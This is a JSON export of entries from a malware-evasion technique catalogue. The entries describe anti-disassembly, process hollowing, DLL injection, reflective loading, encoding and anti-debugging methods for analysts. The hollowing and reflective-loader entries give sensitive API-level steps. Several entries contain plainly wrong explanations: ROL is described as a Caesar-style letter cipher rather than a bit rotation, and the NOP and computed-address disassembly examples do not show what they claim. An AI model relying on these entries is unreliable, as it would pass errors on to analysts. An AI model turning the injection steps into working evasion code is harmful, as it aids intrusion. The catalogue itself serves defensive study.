"key": "dynamically-computed-target-address",
"unprotect_id": "U0208",
"name": "Dynamically Computed Target Address",
"description": "Dynamically computed target addresses is an anti-disassembling technique that involves using dynamically computed addresses as the targets of branch instructions in a program. This can make it difficult for a disassembler to accurately reconstruct the original instructions of the program, as the disassembler will not be able to determine the correct target addresses for the branch instructions without actually executing the program.\r\n\r\n\r\nFor example, suppose a program contains the following instructions:\r\n\r\n```assembly\r\nmov eax, 0x12345678\r\ncall eax\r\n```\r\n\r\nIn this case, the call instruction uses a dynamically computed target address, as the value of the eax register is not known until the program is actually executed. This means that a disassembler will not be able to determine the correct target address for the call instruction without executing the program. If the disassembler tries to disassemble the program without executing it, it might generate incorrect disassembly output, like this:\r\n\r\n```assembly\r\n0x00000000: mov eax, 0x12345678\r\n0x00000004: call eax\r\n```\r\n\r\nIn this case, the disassembler has assumed that the target address of the call instruction is the value stored in the eax register at the time the disassembler was run, but this is not necessarily the correct target address. The actual target address could be different if the program is executed, and the disassembler will not be able to determine the correct target address without executing the program.\r\n\r\nThis technique can be used by malware authors and other attackers to make it more difficult for analysts to disassemble and understand their programs. It can also make it more difficult for other tools, such as debuggers, to accurately interpret the program's behavior. This can be especially effective when the snapshot of the program is taken at a point during its execution when the resolution of the dynamically computed target address has not yet taken place in the code, as this can make it even more difficult for a disassembler to determine the correct target addresses.",
"resources": "https://books.google.fr/books?id=3nPAM3AZ1foC&pg=PA436&lpg=PA436&dq=dynamically+computed+target+address&source=bl&ots=Nm7aJXEhDp&sig=ACfU3U2X1g6CTacHMZ3AH1kyk0XBDRUiQA&hl=en&sa=X&ved=2ahUKEwi5wbKV-pXhAhUPy4UKHS1xAdAQ6AEwAHoECAYQAQ#v=onepage&q=dynamically%20computed%20target%20address&f=false",
"creation_date": "2019-03-18T13:55:53Z",
"tags": "Dynamically computed target addresses,\r\nAnti-disassembling,\r\nBranch instruction,\r\nTarget address,\r\nExecution,",
"modification_date": "2023-10-04T10:44:39.984000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 87,
"key": "disassembly-desynchronization",
"unprotect_id": "U0207",
"name": "Disassembly Desynchronization",
"description": "Disassembly desynchronization is a technique that is used to prevent disassemblers from accurately reconstructing the original instructions of a program. It involves the creative use of instructions and data in a way that breaks the normal, predictable sequence of instructions in a program. This can cause disassemblers to become \"desynchronized\" and generate incorrect disassembly output.\r\n\r\nFor example, suppose a program contains the following instructions:\r\n\r\n```assembly\r\nmov eax, 0x12345678\r\nadd eax, 0x00000004\r\n```\r\n\r\nA disassembler that is working correctly would recognize these instructions and generate the following disassembly output:\r\n\r\n```assembly\r\n0x00000000: mov eax, 0x12345678\r\n0x00000004: add eax, 0x00000004\r\n```\r\n\r\nHowever, if the programmer uses disassembly desynchronization techniques, they could rearrange the instructions in the program in a way that breaks the normal sequence of instructions. For example, they could insert some \"garbage\" instructions or data between the `mov` and `add` instructions, like this:\r\n\r\n```assembly\r\nmov eax, 0x12345678\r\nnop\r\nnop\r\nnop\r\nnop\r\nadd eax, 0x00000004\r\n```\r\n\r\nIn this case, a disassembler that uses a simple, linear sweep algorithm might become \"desynchronized\" when it encounters the nop instructions and generate incorrect disassembly output. This can make it difficult for an analyst to understand the program's behavior and can also make it more difficult for other tools, such as debuggers, to accurately interpret the program.\r\n\r\nDisassembly desynchronization is a well-known anti-disassembly technique that is commonly used by malware authors and other attackers to make it more difficult to analyze and understand their programs. It can be used in conjunction with other anti-disassembly techniques, such as the call trick or the insertion of garbage bytes, to create even more effective and powerful exploits.",
"resources": "https://github.com/yellowbyte/analysis-of-anti-analysis/blob/master/research/the_return_of_disassembly_desynchronization/the_return_of_disassembly_desynchronization.md",
"creation_date": "2019-03-18T13:56:14Z",
"tags": "Disassembly desynchronization,\r\nGarbage instructions,\r\nNOP slide,\r\nLinear sweep,\r\nRecursive traversal,\r\nDisassembly output,\r\nDisassembly accuracy,\r\nInstruction sequence,",
"modification_date": "2023-10-04T10:44:39.272000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 88,
"key": "process-hollowing-runpe",
"unprotect_id": "U1225, E1055.012",
"name": "Process Hollowing, RunPE",
"description": "Process hollowing is a technique used by malware to evade detection by injecting malicious code into a legitimate process. This technique involves creating a new instance of a legitimate process and replacing its original code with the malicious payload. \r\n\r\nThe process is the following:\r\n\r\n* `CreateProcess`: in a suspended mode with the CreationFlag at 0x0000 0004.\r\n* `GetThreadContext`: retrieves the context of the specified thread.\r\n* `ZwUnmapViewOfSection`: Unmaps a view of a section from the virtual address space of a\r\nsubject process.\r\n* `VirtualAllocEx`: allocates memory within the suspended process’s address space.\r\n* `WriteProcessMemory`: writes data of the PE file into the memory just allocated within the\r\nsuspended process.\r\n* `SetThreadContext`: sets the EAX register to the entry point of the executable written.\r\n* `ResumeThread`: resumes the thread of the suspended process.",
"resources": "https://www.blackhat.com/docs/asia-17/materials/asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know-Evasive-Hollow-Process-Injection-wp.pdf\nhttps://speakerdeck.com/fr0gger/teslacrypt-ransomware-analysis",
"creation_date": "2019-03-18T13:56:37Z",
"tags": "Process hollowing, malware, evading detection, injecting, malicious code, legitimate process, memory modification",
"modification_date": "2023-10-04T10:44:56.452000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
11,
12,
15,
22,
23,
132,
357,
380,
381,
388
],
"contributors": []
},
{
"id": 89,
"key": "process-camouflage-masquerading",
"unprotect_id": "U1230, F0005",
"name": "Process Camouflage, Masquerading",
"description": "Masquerading is a technique used by malware to evade detection by disguising itself as a legitimate file. This is typically achieved by renaming the malicious file to match the name of a commonly found and trusted file, such as `svchost.exe`, and placing it in a legitimate folder. \r\n\r\nMasquerading can occur when the name or location of an executable, whether legitimate or malicious, is manipulated or abused to evade security defenses and observation. This technique has many variations and has been observed in various forms.\r\n\r\nThis technique is more a social engineering trick. The malware will use the same techniques to copy and rename the file as a legitimate one in the system. Some examples of how the malware can achieve this are:\r\n\r\n* Using scripting languages such as VBS or PowerShell to copy and rename the files.\r\n* Using built-in Windows commands such as copy and rename.\r\n* Using legitimate tools such as xcopy or robocopy to copy the files while preserving their original timestamps.\r\n\r\nThe detection of this technique is not based on the code used but in the analysis of the file properties such as the name, location, timestamps, and digital signature. And also, on the behavior of the process after it runs.",
"resources": "https://www.endgame.com/blog/technical-blog/how-hunt-masquerade-ball",
"creation_date": "2019-03-18T14:45:21Z",
"tags": "Masquerading, malware, legitimate file, svchost.exe, legitimate folder, name, location, executable, manipulated, abused, security defenses, observation, variations, forms, legitimate software, source, process,",
"modification_date": "2023-10-04T10:44:04.348000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 90,
"key": "parent-process-detection",
"unprotect_id": "U0404",
"name": "Parent Process Detection",
"description": "Parent process is a technique used by malware to evade detection by security analysts. The parent process of a given process is the process that spawned it. \r\n\r\nFor example, most user processes on a Windows system have explorer.exe as their parent process. By checking the parent process of a given process, malware can determine whether it is being monitored by security analysts. If the parent process is not explorer.exe, then the process is likely being monitored and the malware can take evasive action, such as terminating itself.",
"resources": "https://cysinfo.com/detecting-malicious-processes-psinfo-volatility-plugin/",
"creation_date": "2019-03-18T14:46:02Z",
"tags": "Process,\r\nSpawn,\r\nExplorer.exe,\r\nMonitoring,\r\nEvasive action,\r\nTermination,\r\nEncryption,",
"modification_date": "2023-10-04T10:42:17.040000Z",
"category": [
6
],
"rules": [
127
],
"attachments": [],
"featured_api": [
23,
26,
27,
28,
355,
419
],
"contributors": []
},
{
"id": 91,
"key": "entry-point-modification",
"unprotect_id": "U1228",
"name": "Entry Point Modification",
"description": "The entry point is the starting point of an executable file during execution. Some malware use techniques such as changing or relocating the real entry point to protect their code from analysis. This makes it difficult for security software to identify and detect the malware as the code is not executed in the usual way.",
"resources": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/",
"creation_date": "2019-03-18T14:46:26Z",
"tags": "entry point, executable file, execution, malware, techniques, changing, relocating, real entry point, protect code, analysis, security software, identification,",
"modification_date": "2023-10-04T10:42:18.759000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 92,
"key": "hook-injection",
"unprotect_id": "U1227, E1055.m01",
"name": "Hook Injection",
"description": "Hook injection is a technique used by malware to alter the behavior of internal functions in an operating system or application. This is typically achieved by inserting malicious code into existing function calls, allowing the malware to intercept and manipulate the normal flow of execution.\r\n\r\nIn the case of Windows, the `SetWindowsHookEx` function can be used by programs to install hooks that monitor events such as mouse clicks and keyboard key presses. This can enable malware to monitor user actions and steal sensitive information or perform other malicious actions. By using hook injection, malware can evade detection and continue to operate stealthily within a system.",
"resources": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\nhttps://www.ired.team/offensive-security/code-injection-process-injection/setwindowhookex-code-injection",
"creation_date": "2019-03-18T14:47:10Z",
"tags": "Hook injection, malware, internal functions, operating system, application, malicious code, existing function calls, intercept, manipulate, normal flow of execution, SetWindowsHookEx function,",
"modification_date": "2023-10-04T10:44:04.798000Z",
"category": [
4
],
"rules": [
118,
119
],
"attachments": [],
"featured_api": [
117,
131,
212,
272
],
"contributors": []
},
{
"id": 93,
"key": "dll-injection-via-createremotethread-and-loadlibrary",
"unprotect_id": "U1226, E1055.001",
"name": "DLL Injection via CreateRemoteThread and LoadLibrary",
"description": "DLL Injection Via `CreateRemoteThread` and `LoadLibrary` is a technique used by malware to inject its code into a legitimate process. This technique is similar to hook injection, where the malware inserts a malicious DLL to be used by the system. It is one of the most common techniques used to inject malware into another process.\r\n\r\nThe malware writes the path to its malicious dynamic-link library (DLL) in the virtual address space of the target process, and then creates a remote thread in the target process. The thread's start address is the `LoadLibrary` function, which is used to load the malicious DLL into the target process's address space. This allows the malware to execute its code within the context of the target process, without creating new processes or threads.",
"resources": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"creation_date": "2019-03-18T14:47:37Z",
"tags": "DLL Injection, CreateRemoteThread, LoadLibrary, malware, hook injection, process, system, code injection, legitimate process, virtual address space, remote thread, target process, LoadLibrary function, malicious DLL, execution,",
"modification_date": "2023-10-04T10:43:55.058000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
1,
3,
4,
5,
6,
7,
8,
9,
10,
23,
24,
355,
381,
419,
425
],
"contributors": []
},
{
"id": 94,
"key": "fileless-mechanisms",
"unprotect_id": "U1205, B0027.001",
"name": "FIleless Mechanisms",
"description": "Fileless malware is a type of malware that is designed to reside and execute entirely in the memory of a host system, without leaving any trace on the local disk. This can make it more difficult for security tools to detect and remove the malware, as it does not leave any files on the system that can be scanned or deleted.\r\n\r\nFileless malware is typically delivered through a variety of means, such as email attachments, malicious websites, or exploit kits. Once it has been delivered to the host system, it may use a variety of techniques to avoid detection and persist in the memory of the system. This can include modifying system settings, injecting code into legitimate processes, or using fileless malware-specific tools and frameworks.\r\n\r\nFileless malware can be difficult to detect and mitigate, as it does not leave any physical evidence on the system and can often evade traditional security measures that rely on scanning and analyzing the local disk. As a result, it is important for individuals and organizations to take steps to protect themselves against this type of malware, such as by keeping their systems and applications up to date, practicing safe browsing habits, and using security software that is designed to detect and mitigate fileless malware threats.",
"resources": "https://blog.minerva-labs.com/deconstructing-fileless-attacks-into-4-underlying-techniques",
"creation_date": "2019-03-18T14:48:03Z",
"tags": "Fileless malware,\r\nMemory,\r\nEmail attachments,\r\nMalicious websites,\r\nExploit kits,\r\nSystem settings,\r\nLegitimate processes,\r\nFileless malware-specific tools,",
"modification_date": "2023-10-04T10:43:48.702000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 95,
"key": "xor-operation",
"unprotect_id": "U0701,E1027.m02",
"name": "XOR Operation",
"description": "The XOR operation is a common technique used by malware to hide data. This is because it is a simple and reversible function, meaning that the same operation can be used to both encode and decode data. In the XOR operation, a key is used to create a ciphertext, which is then used to encrypt the original data. \r\n\r\nThe encrypted data can then be decrypted using the same key, allowing the original data to be accessed. The XOR operation is often used by malware because it is easy to implement and can be used to effectively conceal data from detection.",
"resources": "https://isc.sans.edu/forums/diary/Malware+and+XOR+Part+1/22486/",
"creation_date": "2019-03-18T14:52:04Z",
"tags": "XOR operation,\r\nKey,\r\nCiphertext,\r\nReversible function,\r\nEncode,\r\nDecode,\r\nEncrypt,\r\nDecrypt,",
"modification_date": "2024-01-04T05:14:05.126000Z",
"category": [
7
],
"rules": [
131,
136
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 96,
"key": "base64",
"unprotect_id": "U0706, E1027.m02",
"name": "Base64",
"description": "Base64 is a simple encoding scheme that is often used by malware to represent binary data in an ASCII string. This allows the malware to encode and transmit binary data, such as a payload or network traffic, in a way that is more compact and easier to transmit over text-based communication channels. \r\n\r\nBase64 uses a 64-character alphabet to encode the data, which includes the upper and lower case letters, the digits 0-9, and the symbols \"+\" and \"/\". The encoded data is typically padded with the character \"=\" to ensure that it has a length that is a multiple of 4. The encoded data can then be decoded using the same 64-character alphabet to recover the original binary data. This makes Base64 a useful tool for malware to conceal their payloads and communicate with their command and control (C2) servers.",
"resources": "https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0",
"creation_date": "2019-03-18T14:52:37Z",
"tags": "Base64,\r\nBinary data,\r\nASCII string,\r\nEncoding,\r\nText-based communication channels,\r\n64-character alphabet,\r\nPadded,",
"modification_date": "2024-01-11T05:22:12.678000Z",
"category": [
7
],
"rules": [
146
],
"attachments": [],
"featured_api": [],
"contributors": [
5,
33
]
},
{
"id": 97,
"key": "caesar-cipher",
"unprotect_id": "U0705",
"name": "Caesar Cipher",
"description": "The Caesar Cipher is a simple encoding algorithm that was used during the Roman Empire to hide secret messages. In this algorithm, each letter of the plaintext is replaced with a letter that is a fixed number of positions down the alphabet. For example, if the shift value is 3, then the letter \"A\" would be replaced with \"D\", \"B\" would be replaced with \"E\", and so on. \r\n\r\nThe Caesar Cipher is a monoalphabetic substitution cipher, meaning that each letter of the plaintext is replaced with the same letter of the ciphertext every time it appears. This makes the Caesar Cipher relatively easy to break, as frequency analysis can be used to determine the shift value and decrypt the ciphertext. \r\n\r\nThe Caesar Cipher algorithm can be used by malware in several ways. One possible use case is to encode the payload or command and control (C2) communication in order to make it more difficult for security tools and forensic investigators to detect and analyze. \r\n\r\nAnother possible use case is to use the Caesar Cipher as part of a more complex encoding scheme, such as using it to encrypt the payload and then using another algorithm, such as Base64, to encode the resulting ciphertext. This can make the encoded payload even more difficult to detect and analyze. In both cases, the use of the Caesar Cipher can help the malware avoid detection and continue operating on a compromised system.",
"resources": "https://blog.malwarebytes.com/threat-analysis/2013/03/obfuscation-malwares-best-friend/",
"creation_date": "2019-03-18T14:53:09Z",
"tags": "Caesar Cipher,\r\nEncoding algorithm,\r\nRoman Empire,\r\nSecret message,\r\nMonoalphabetic substitution cipher,\r\nPlaintext,\r\nCiphertext,\r\nShift value,\r\nFrequency analysis,",
"modification_date": "2023-10-04T10:42:42.092000Z",
"category": [
7
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 98,
"key": "rol",
"unprotect_id": "U0704",
"name": "ROL",
"description": "ROL, or Rotate Left, is a simple encoding algorithm similar to the Caesar Cipher. In the ROL algorithm, each letter of the plaintext is replaced with a letter that is a fixed number of positions down the alphabet. For example, if the rotation value is 3, then the letter \"A\" would be replaced with \"D\", \"B\" would be replaced with \"E\", and so on. \r\n\r\nROL is a monoalphabetic substitution cipher, meaning that each letter of the plaintext is replaced with the same letter of the ciphertext every time it appears. This makes ROL relatively easy to break, as frequency analysis can be used to determine the rotation value and decrypt the ciphertext. \r\n\r\nDespite its weaknesses, ROL is still a popular algorithm for teaching the basics of cryptography. In the context of malware, ROL can be used to encode the payload or communication channels in order to avoid detection and analysis.",
"resources": "https://blog.malwarebytes.com/threat-analysis/2013/03/obfuscation-malwares-best-friend/",
"creation_date": "2019-03-18T14:53:31Z",
"tags": "ROL,\r\nCaesar Cipher,\r\nEncoding algorithm,\r\nPlaintext,\r\nCiphertext,\r\nRotation value,\r\nMonoalphabetic substitution cipher,\r\nFrequency analysis,",
"modification_date": "2023-10-04T10:42:51.702000Z",
"category": [
7
],
"rules": [],
"attachments": [],
"featured_api": [
335
],
"contributors": []
},
{
"id": 99,
"key": "cryptography",
"unprotect_id": "U0703, E1027.m04",
"name": "Cryptography",
"description": "Cryptography is a technique often used by malware to protect against analysis or to perform malicious actions such as in ransomware attacks. In these cases, malware will use cryptography to encrypt their payloads or communication channels in order to make it difficult for security tools and forensic investigators to detect and analyze their activities. \r\n\r\nAdditionally, cryptography can be used by malware to make their payloads more difficult to reverse engineer, making it harder for researchers to understand their inner workings and develop effective countermeasures.",
"resources": "https://www.blackhat.com/docs/sp-14/materials/arsenal/sp-14-Schmitt-A-Different-Kind-of-Crypto-Slides.pdf",
"creation_date": "2019-03-18T14:53:51Z",
"tags": "Cryptography,\r\nRansomware,\r\nEncrypt,\r\nPayloads,\r\nCommunication channels,",
"modification_date": "2023-10-04T10:44:21.880000Z",
"category": [
7
],
"rules": [
42
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 100,
"key": "custom-encoding",
"unprotect_id": "U0702,E1027.m03",
"name": "Custom Encoding",
"description": "Malware often uses custom encoding schemes to conceal their payloads and avoid detection. These custom schemes can be full custom layers, or they can be variations of known algorithms such as XOR or Base64. Using custom encoding schemes allows malware to encode their payloads in a unique way that can be difficult for security tools and forensic investigators to detect. \r\n\r\nIn some cases, the custom encoding scheme may be a combination of different algorithms, such as using XOR to encrypt the payload and then using Base64 to encode the resulting ciphertext. This can make the encoded payload even more difficult to detect and analyze.\r\n\r\nTo safeguard payloads and communication channels, multiple data encoding operations (e.g., XOR, ADD, SUB, ROL, and ROR) can also be chained together with a randomly generated key. These operations are not only simple to execute and reverse but also demand minimal computing resources.",
"resources": "https://securityintelligence.com/an-example-of-common-string-and-payload-obfuscation-techniques-in-malware/",
"creation_date": "2019-03-18T14:54:13Z",
"tags": "Custom encoding schemes,\r\nConceal,\r\nPayloads,\r\nFull custom layers,\r\nVariations,\r\nKnown algorithms,\r\nXOR,\r\nBase64,",
"modification_date": "2023-10-04T10:44:46.799000Z",
"category": [
7
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 101,
"key": "geofencing",
"unprotect_id": "U1006",
"name": "Geofencing",
"description": "Geofencing in malware refers to a technique used by cybercriminals to restrict the distribution or activation of malicious software based on geographical location. Malware authors use geofencing to target specific regions or avoid certain areas, such as their home country, in order to evade detection, minimize the chances of being investigated, or maximize the effectiveness of their attacks.\r\n\r\nGeofencing works by checking the IP address, GPS coordinates, or other location data of a potential victim's device. If the device is within the predetermined boundaries defined by the attacker, the malware may proceed with its intended actions, such as infecting the device, stealing data, or launching further attacks. Conversely, if the device is outside the defined boundaries, the malware may remain dormant or deactivate itself to avoid detection.\r\n\r\nMalware authors might use geofencing for various reasons, such as:\r\n\r\n\r\n1. **Targeting specific countries or regions:** Attackers may focus on certain areas due to economic, political, or strategic reasons, or to exploit known vulnerabilities in specific regions.\r\n\r\n2. **Avoiding detection by security researchers:** By restricting the distribution of malware to specific regions, attackers may make it more difficult for security researchers to obtain and analyze samples of the malicious software.\r\n\r\n3. **Evading law enforcement:** By not targeting their own country, cybercriminals can minimize the risk of drawing the attention of local law enforcement agencies.\r\n\r\n4. **Complying with criminal partnerships:** Some cybercriminal groups may have agreements not to target each other's territories, and geofencing allows them to abide by these agreements while still conducting their operations.",
"resources": "https://www.vmray.com/cyber-security-blog/sandbox-evasion-techniques-part-4/",
"creation_date": "2019-03-18T14:54:34Z",
"tags": "geofencing, malware, cybercriminals, geographical location, IP address, GPS coordinates, location data, victim's device, predetermined boundaries, distribution, activation, malicious software, targeting, regions",
"modification_date": "2023-10-04T10:44:25.920000Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [
331
],
"contributors": []
},
{
"id": 102,
"key": "shortcut-hiding",
"unprotect_id": "U0505",
"name": "Shortcut Hiding",
"description": "Windows shortcut can be used to store code that downloads a malicious file from the internet, or that stores the malicious file directly within the shortcut itself. This can make it difficult for antivirus software to detect the malicious application, as the file is not stored in a typical location on the computer. Additionally, the use of a shortcut can make it easier for the attacker to hide the malicious code and evade detection.",
"resources": "",
"creation_date": "2019-03-18T14:56:11Z",
"tags": "Windows shortcut,\r\nAntivirus software,\r\nHide code,\r\nEvade detection,",
"modification_date": "2023-10-04T10:38:07.524000Z",
"category": [
2
],
"rules": [
130
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 103,
"key": "time-bomb",
"unprotect_id": "U1005, B0007.008",
"name": "Time Bomb",
"description": "Some malware contains a built-in expiration date, after which the malware will no longer run or function. This can be used by attackers to limit the time during which the malware can be detected and analyzed by security researchers. In order to run and analyze the malware after its expiration date, security researchers must manually change the date on the machine where the malware is being analyzed. \r\n\r\nThis can be effective in defeating sandbox environments, which are typically used to isolate and analyze malware, if the sandbox's clock is not set to the current date. By using this technique, attackers can make it more difficult for researchers to analyze and understand their malware, potentially allowing it to evade detection.",
"resources": "https://en.wikipedia.org/wiki/Time_bomb_(software)",
"creation_date": "2019-03-18T14:56:28Z",
"tags": "timebomb,\r\nchange date,\r\nsandbox environments,\r\nisolate malware,\r\nanalyze malware,\r\nclock,",
"modification_date": "2023-10-04T10:42:26.818000Z",
"category": [
1,
14
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 104,
"key": "redirect-antivirus-website",
"unprotect_id": "U0504",
"name": "Redirect Antivirus Website",
"description": "To avoid connection to anti malware website, malware can modify the host file to redirect the connexion.",
"resources": "https://blog.malwarebytes.com/cybercrime/2016/09/hosts-file-hijacks/",
"creation_date": "2019-03-23T16:44:11Z",
"tags": "",
"modification_date": "2023-10-04T10:42:24.854000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 105,
"key": "stolen-certificate",
"unprotect_id": "U0503",
"name": "Stolen certificate",
"description": "To avoid detection, attackers can use stolen certificates from known companies. It allows the malware to bypass security solution.",
"resources": "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
"creation_date": "2019-03-23T16:51:37Z",
"tags": "",
"modification_date": "2023-10-04T10:42:24.333000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 106,
"key": "code-cave",
"unprotect_id": "U0502",
"name": "Code Cave",
"description": "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code’s script functions that have capacity for the injection of custom instructions. For example, if a script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script.",
"resources": "https://resources.infosecinstitute.com/injecting-spyware-exe-code-injections/",
"creation_date": "2019-03-23T16:53:39Z",
"tags": "",
"modification_date": "2023-10-04T10:42:32.184000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
4,
5
]
},
{
"id": 107,
"key": "ntsetdebugfilterstate",
"unprotect_id": "U0103",
"name": "NtSetDebugFilterState",
"description": "The `NtSetDebugFilterState` and `DbgSetDebugFilterState` functions are used by malware to detect the presence of a kernel mode debugger. These functions allow the malware to set up a debug filter, which is a mechanism that can be used to detect and respond to the presence of a debugger.\r\n\r\nWhen a kernel mode debugger is present, the debug filter will be triggered, and the malware can then take actions to evade detection and continue to operate. This technique is commonly used by malware to avoid analysis by security researchers and avoid being detected by security software. By using these functions, the malware can operate stealthily and evade detection, making it difficult for analysts to reverse engineer the malware and understand its capabilities and behaviors.",
"resources": "",
"creation_date": "2019-03-23T17:00:59Z",
"tags": "NtSetDebugFilterState,\r\nDbgSetDebugFilterState,\r\nKernel mode debugger detection,\r\nDebug filter,",
"modification_date": "2022-12-06T09:47:13.926000Z",
"category": [
3
],
"rules": [
66
],
"attachments": [
"b913237e-4937-4062-9187-b752a00d818c"
],
"featured_api": [
376,
425
],
"contributors": []
},
{
"id": 108,
"key": "guard-pages",
"unprotect_id": "U0102, B0006.006",
"name": "Guard Pages",
"description": "Memory breakpoints are a technique used by malware to detect if a debugger is present. This technique involves setting up a \"guard page\" in memory, which is a page of memory that is protected by the operating system and cannot be accessed by normal code. If a debugger is present, the malware can use this guard page to detect its presence.\r\n\r\nThis technique works by putting a return address onto the stack, then accessing the guard page. If the operating system detects that the guard page has been accessed, it will raise a STATUS_GUARD_PAGE_VIOLATION exception. The malware can then check for this exception, and if it is present, it can assume that no debugging is taking place. This allows the malware to evade detection and continue to operate without being interrupted by a debugger.",
"resources": "http://antukh.com/blog/2015/01/19/malware-techniques-cheat-sheet/",
"creation_date": "2019-03-23T17:05:57Z",
"tags": "Memory breakpoints,\r\nGuard pages,\r\nDebugger detection,\r\nSTATUS_GUARD_PAGE_VIOLATION,",
"modification_date": "2023-10-04T10:44:17.143000Z",
"category": [
3
],
"rules": [
68
],
"attachments": [],
"featured_api": [
3,
363,
422
],
"contributors": []
},
{
"id": 109,
"key": "suspendthread",
"unprotect_id": "U0101, C0055",
"name": "SuspendThread",
"description": "Suspending threads is a technique used by malware to disable user-mode debuggers and make it more difficult for security analysts to reverse engineer and analyze the code. This can be achieved by using the `SuspendThread` function from the kernel32.dll library or the `NtSuspendThread` function from the NTDLL.DLL library. \r\n\r\nThe malware can enumerate the threads of a given process, or search for a named window and open its owner thread, and then suspend that thread. This will prevent the debugger from running and make it more difficult to analyze the code. \r\n\r\nThis technique can be used by malware authors to evade detection and analysis, and make their code more difficult to understand.",
"resources": "https://anti-reversing.com/Downloads/Anti-Reversing/The_Ultimate_Anti-Reversing_Reference.pdf\nhttps://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread\nhttp://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtSuspendThread.htmlhttps://secret.club/2021/01/04/thread-stuff.html",
"creation_date": "2019-03-23T17:09:11Z",
"tags": "SuspendThread,\r\nNtSuspendThread,\r\nDebugging,\r\nAnti-debugging,\r\nThread enumeration,\r\nProcess enumeration,",
"modification_date": "2023-10-04T10:44:18.329000Z",
"category": [
3
],
"rules": [
65
],
"attachments": [],
"featured_api": [
18,
23,
26,
27,
28,
29,
30,
106,
133,
239,
245,
290,
295,
355,
412,
419
],
"contributors": []
},
{
"id": 110,
"key": "reflective-dll-injection",
"unprotect_id": "U1224",
"name": "Reflective DLL injection",
"description": "Reflective DLL loading refers to loading a DLL from memory rather than from disk. Windows doesn’t have a `LoadLibrary` function that supports this, so to get the functionality you have to write your own, omitting some of the things Windows normally does, such as registering the DLL as a loaded module in the process, potentially bypassing DLL load monitoring.\r\n\r\nThe way the reflective injection works is described by the technique's original author Stephen Fewer:\r\n\r\n* Execution is passed, either via `CreateRemoteThread` or a tiny bootstrap shellcode, to the library's\r\n\r\n* ReflectiveLoader function which is an exported function found in the library's export table.\r\n\r\n- As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.\r\n\r\n- The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely `LoadLibraryA`, `GetProcAddress` and `VirtualAlloc`.\r\n\r\n- The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.\r\n\r\n- The library's headers and sections are loaded into their new locations in memory.\r\n\r\n- The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.\r\n\r\n- The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.\r\n\r\n- The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with `DLL_PROCESS_ATTACH`. The library has now been successfully loaded into memory.\r\n\r\n- Finally, the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via `CreateRemoteThread`, the thread will terminate.",
"resources": "https://0x00sec.org/t/reflective-dll-injection/3080\nhttps://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection",
"creation_date": "2019-03-23T17:13:35Z",
"tags": "",
"modification_date": "2023-10-04T10:42:57.942000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
7,
23,
340,
357,
365,
380,
419,
425,
439
],
"contributors": []
},
{
"id": 111,
"key": "thread-execution-hijacking",
"unprotect_id": "U1223, E1055.003",
"name": "Thread Execution Hijacking",
"description": "Thread execution hijacking is a technique used by malware to evade detection by targeting an existing thread of a process and avoiding any noisy process or thread creation operations. This technique allows the malware to run its code within the context of the targeted thread, without creating new processes or threads, which can be easily detected by security software.\r\n\r\nDuring analysis, it is possible to observe calls to `CreateToolhelp32Snapshot` and `Thread32First` functions followed by `OpenThread`, which are used by the malware to enumerate and select the target thread.",
"resources": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"creation_date": "2019-03-23T17:16:57Z",
"tags": "thread execution hijacking, malware, evading detection, existing thread, process, avoiding noisy process, thread creations operations, analysis, CreateToolhelp32Snapshot, Thread32First,",
"modification_date": "2023-10-04T10:42:29.198000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
18,
23,
28,
29,
30
],
"contributors": []
},
{
"id": 112,
"key": "image-file-execution-options-injection",
"unprotect_id": "U1222",
"name": "Image File Execution Options Injection",
